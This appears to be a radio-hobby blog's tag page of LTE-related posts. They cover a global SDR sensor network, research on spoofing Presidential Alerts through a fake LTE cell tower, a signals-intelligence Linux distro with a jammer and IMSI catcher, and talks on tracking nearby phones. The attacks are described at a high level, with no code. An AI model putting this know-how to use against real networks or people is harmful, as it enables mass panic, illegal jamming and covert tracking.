Tagged: LTE

Electrosense+: Global Network of RTL-SDR Sensors with Decoding of FM/AM ADS-B AIS LTE ACARS

Back in late 2019 we posted about the Electrosense network which is an open source project aiming to deploy radio spectrum sensors worldwide. The idea is to help analyze and understand radio spectrum usage across the globe. Each sensor consists of an RTL-SDR, Raspberry Pi and an optional downconverter to receive the higher bands.

Recently Dr. Sofie Pollen wrote in and informed us that they have recently upgraded Electrosense and now users can use any sensor on the network to actually decode signals remotely over a web browser. The currently supported demodulators/decoders include FM/AM, ADS-B, AIS, LTE base station info and ACARS. This makes the Electrosense network kind of similar to the KiwiSDR or OpenWebRX SDR network where there are also various decoders built into the web software.

To test it out you need to create an Electrosense account at electrosense.org. Once logged in, go to "My Electrosense" on the top right, and choose "Spectrum Decoder". You can then choose from a number of Electrosense contributors stationed around the world. Once the waterfall is displayed you can click on signals to decode and listen to them, or change the decoder. Changing to ADS-B or AIS will bring up a map with decoded aircraft or boat positions. Changing to ACARS or LTE will show a text window with the decoded information.

A full electrosense kitset can be purchased from Jetvision, however Sofie notes that they do ship free sensors to some people who cannot afford the kit, and you can apply to increase coverage in your area via this link.

Currently active electrosense sensors
Currently active Electrosense sensors
Electrosense web GUI decoding a wideband FM signal
Electrosense web GUI decoding a wideband FM signal

Using a Software Defined Radio to Send Fake Presidential Alerts over LTE

Modern cell phones in the USA are all required to support the Wireless Emergency Alert (WEA) program, which allows citizens to receive urgent messages like AMBER (child abduction) alerts, severe weather warnings and Presidential Alerts.

In January 2018 an incoming missile alert was accidentally issued to residents in Hawaii, resulting in panic and disruption. More recently an unblockable Presidential Alert test message was sent to all US phones. These events have prompted researchers at the University of Colorado Boulder to investigate concerns over how this alert system could be hacked, potentially allowing bad actors to cause mass panic on demand (SciHub Paper).

Their research showed that four low cost USRP or bladeRF TX capable software defined radios (SDR) with 1 watt output power each, combined with open source LTE base station software could be used to send a fake Presidential Alert to a stadium of 50,000 people (note that this was only simulated - real world tests were performed responsibly in a controlled environment). The attack works by creating a fake and malicious LTE cell tower on the SDR that nearby cell phones connect to. Once connected an alert can easily be crafted and sent to all connected phones. There is no way to verify that an alert is legitimate.

Spoofed Presidential Alerts Received on a Galaxy S8 and iPhone X.
Spoofed Presidential Alerts Received on a Galaxy S8 and iPhone X.

SigintOS: A Linux Distro for Signal Intelligence

Recently we've heard of a new Linux distribution called SigintOS becoming available for download. SigintOS is an Ubuntu based distribution with a number of built in signal intelligence applications for software defined radios such as RTL-SDRs and other TX capable SDRs like the HackRF, bladeRF and USRP radios.

The distro appears to be very well executed, with a built in GUI that grants easy access to the some common sigint tools like an FM and GPS transmitter, a jammer, a GSM base station search tool and an IMSI catcher. SigintOS also has various other preinstalled programs such as GNU Radio, gr-gsm, YatesBTS, wireshark and GQRX.

The OS also teases an LTE search and LTE decoder which to access requires that you get in contact with the creators, presumably for a licencing fee. Regarding an LTE IMSI catcher they write:

LTE IMSI Catcher is not myth!

Due to the nature of LTE base stations, the capture of IMSI numbers seems impossible. LTE stations use GUTI to communicate with users instead of IMSI. The GUTI contains the temporary IMSI number called T-IMSI. This allows the operator to find out who is at the corresponding LTE station who is authorized to query T-IMSI information.

Can the GUTI number be found?
Answer Yes!

How to find GUTI and T-IMSI numbers?
Can be found with the help of SigintOS …

For detailed information [email protected]

The image comes as a 2GB ISO file, and it's possible to run it in WMWare or VirtualBox.

SigintOS IMSI Catcher

Upcoming Book “Inside Radio: An Attack and Defense Guide”

Unicorn team are information security researchers who often also dabble with wireless security research. Recently they have been promoting their upcoming text book titled "Inside Radio: An Attack and Defense Guide".

Judging from the blurb and released contents the book will be an excellent introduction to anyone interested in today's wireless security issues. They cover topics such as RFID, Bluetooh, ZigBee, GSM, LTE and GPS. In regards to SDRs, the book specifically covers SDRs like the RTL-SDR, HackRF, bladeRF and LimeSDR and their role in wireless security research. They also probably reference and show how to use those SDRs in the  chapters about replay attacks, ADS-B security risks, and GSM security.

The book is yet to be released and is currently available for pre-order on Amazon or Springer for US$59.99. The expected release date is May 9, 2018, and copies will also be for sale at the HITB SECCONF 2018 conference during 9 - 13 April in Amsterdam.

The blurb and released contents are pasted below. See their promo page for the full contents list:

This book discusses the security issues in a wide range of wireless devices and systems, such as RFID, Bluetooth, ZigBee, GSM, LTE, and GPS. It collects the findings of recent research by the UnicornTeam at 360 Technology, and reviews the state-of-the-art literature on wireless security. The book also offers detailed case studies and theoretical treatments – specifically it lists numerous laboratory procedures, results, plots, commands and screenshots from real-world experiments. It is a valuable reference guide for practitioners and researchers who want to learn more about the advanced research findings and use the off-the-shelf tools to explore the wireless world.

Qing YANG is the founder of UnicornTeam & the head of the Radio Security Research Department at 360 Technology. He has vast experience in information security area. He has presented at Black Hat, DEFCON, CanSecWest, HITB, Ruxcon, POC, XCon, China ISC etc.

Lin HUANG is a senior wireless security researcher and SDR technology expert at 360 Technology. Her interests include security issues in wireless communication, especially cellular network security. She was a speaker at Black Hat, DEFCON, and HITB security conferences. She is 360 Technology’s 3GPP SA3 delegate.

This book is a joint effort by the entire UnicornTeam, including Qiren GU, Jun LI, Haoqi SHAN, Yingtao ZENG, and Wanqiao ZHANG etc.


DEFCON 23 – LTE Recon and Tracking with RTLSDR

Back on Dec 5 we posted about some Defcon 23 talks that were released from the Wireless Village set of talks. Recently some more talks from other tracks have been released and one of interest to our blog is the talk by Ian Kline titled “LTE Recon and Tracking with RTLSDR”. The talk’s blurb reads:

Since RTLSDR became a consumer grade RX device, numerous talks and open source tools enabled the community to monitor airplanes, ships, and cars… but come on, what we really want to track are cell phones. If you know how to run cmake and have $50 to pick up an RTLSDR-E4000, I’ll make sure you walk out of here with the power to monitor LTE devices around you on a slick Kibana4 dashboard. You’ll also get a primer on geolocating the devices if you’ve got a second E4000 and some basic soldering skills.

DEF CON 23 – Ian Kline – LTE Recon and Tracking with RTLSDR

Analyzing TD-LTE with the RTL-SDR

TD-LTE is a mobile phone standard acronym for Time Division Long Term Evolution. It is one of two variants of LTE technology, with the other being FD-LTE (Frequency Division LTE).

Over in China where TD-LTE is commonly used, Jiao Xianjun discovered that the current LTE-Cell-Scanner Linux program did not support TD-LTE, so he made a fork which does support TD-LTE. LTE-Cell-Scanner is a program which can decode LTE cell tower data which contains information like the cell ID, transmit frequency and transmit strength. With his modified LTE-Cell-Scanner, some MATLAB scripts he wrote and an RTL-SDR, Jiao was able to decode the cell information from 10 TD-LTE signals and 2 FD-LTE signals. He has uploaded a video showing this too.

TD-LTE, LTE FDD, scanning/demodulation results in Beijing, China